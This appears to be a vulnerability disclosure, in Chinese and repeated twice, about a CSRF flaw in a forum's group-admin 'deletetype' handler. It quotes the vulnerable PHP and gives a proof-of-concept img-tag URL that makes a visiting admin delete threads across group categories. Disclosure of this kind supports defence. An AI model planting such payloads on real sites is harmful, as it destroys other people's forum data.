VULHUB ™

### 简要描述： ### 详细说明： admin_group.php ``` } elseif($operation == 'deletetype') {//没有验证fromhash导致可以csrf删除 $fid = $_GET['fid']; $ajax = $_GET['ajax']; $confirmed = $_GET['confirmed']; $finished = $_GET['finished']; $total = intval($_GET['total']); $pp = intval($_GET['pp']); $currow = intval($_GET['currow']); if($ajax) { ob_end_clean(); require_once libfile('function/post'); $tids = array(); foreach(C::t('forum_thread')->fetch_all_by_fid($fid, $pp) as $thread) { $tids[] = $thread['tid']; } require_once libfile('function/delete'); deletethread($tids);//这里便直接删除了 ``` ### 漏洞证明： 开启群组功能之后 发帖添加一个img标签 图片志向 http://127.0.0.1/x32/admin.php?action=group&operation=deletetype&fid=11&confirmed=1&ajax=1&pp=2000&total=0&currow=0 其中的fid便是分类的id 可以遍历一下 即可删除所有分组

### 简要描述： ### 详细说明： admin_group.php ``` } elseif($operation == 'deletetype') {//没有验证fromhash导致可以csrf删除 $fid = $_GET['fid']; $ajax = $_GET['ajax']; $confirmed = $_GET['confirmed']; $finished = $_GET['finished']; $total = intval($_GET['total']); $pp = intval($_GET['pp']); $currow = intval($_GET['currow']); if($ajax) { ob_end_clean(); require_once libfile('function/post'); $tids = array(); foreach(C::t('forum_thread')->fetch_all_by_fid($fid, $pp) as $thread) { $tids[] = $thread['tid']; } require_once libfile('function/delete'); deletethread($tids);//这里便直接删除了 ``` ### 漏洞证明： 开启群组功能之后 发帖添加一个img标签 图片志向 http://127.0.0.1/x32/admin.php?action=group&operation=deletetype&fid=11&confirmed=1&ajax=1&pp=2000&total=0&currow=0 其中的fid便是分类的id 可以遍历一下 即可删除所有分组